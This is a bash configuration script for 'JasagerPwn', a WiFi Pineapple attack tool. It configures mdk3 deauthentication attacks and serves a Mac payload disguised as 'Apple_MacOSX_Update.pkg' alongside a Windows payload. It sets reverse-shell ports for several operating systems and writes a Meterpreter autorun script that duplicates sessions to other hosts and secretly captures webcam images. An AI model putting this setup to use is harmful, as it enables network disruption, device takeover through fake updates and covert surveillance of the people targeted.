#!/bin/bash
#
# JasagerPwn [Reborn] - Version 2.x
# Author: Leg3nd @ https://leg3nd.me
#

#------------------------------------------------------------------------------------------
# CONFIGURATION / VARIABLES
#------------------------------------------------------------------------------------------
# [System Information]
deauth_interface="wlan0" # Interface for local deauthentication attacks

# [Pineapple Information]
# Interface connecting to pineapple from this machine
pineapple_interface="wlan1"
# Pineapple IP - Must be in 172.16.42.0/24
pineapple_ip="172.16.42.1"
 # SSH Password for pinepple (for remote command execution)
pineapple_password="pineapple"
 # Mac address of pineapple
pineapple_mac="00:11:22:33:44:55"

# [Payload Information]
# Custom Windows Payload (blank will default to metasploit)
windows_payload="payloads/powershell-https.exe"
# Custom Mac PKG Payload - can be created with "osx_payload_installer" in the resources/ directory.
mac_payload="payloads/Apple_MacOSX_Update.pkg"
# Port for  Mac reverse shells
osx_port="6446"
# Port for other Windows meterpreter shells (such as windows_payload)
win_port="587"
# Port for Windows PowerShell shells (requires a different AutoRunScript)
ps_win_port="8080"
# Port for Linux reverse shells
nix_port="8443"
# Meterpreter AutoRunScript - Assosiated with ${windows_payload}
echo -e "duplicate -r 172.16.42.2 -p 8080 -D
duplicate -r 172.16.42.3 -p 8080 -D
webcam -f -p /tmp/collected
" > /tmp/autorun.rc

# [DeAuth Configurations]
# MDK3 Channels to hop (comma seperated)
channels="1,2,3,4,5,6,7,8,9,10,11"
# MDK3 Deauthentication Config File (dont change file location)
echo "${pineapple_mac}
00:00:00:00:00:00
FF:FF:FF:FF:FF:FF" > /tmp/deauth.conf
# Leg3nd's DeAuth Script - comma seperated format (AP's only).
deauth_whitelist="${pineapple_mac},40:0E:85:02:31:6B,00:00:00:00:00,FF:FF:FF:FF:FF,AE:22:0B:33:74:F9"

# [ Debug Output Configurations]
# Enable or disable debug.
# WARNING: This will have network and system configuration information.
debug="0"
# Output file for debug infromation
debug_output="debug_$(date +%Y-%d-%m-%s).txt"
#------------------------------------------------------------------------------------------

# Start it all up [DONT EDIT BELOW HERE] #
source src/system_modules/main.sh
main

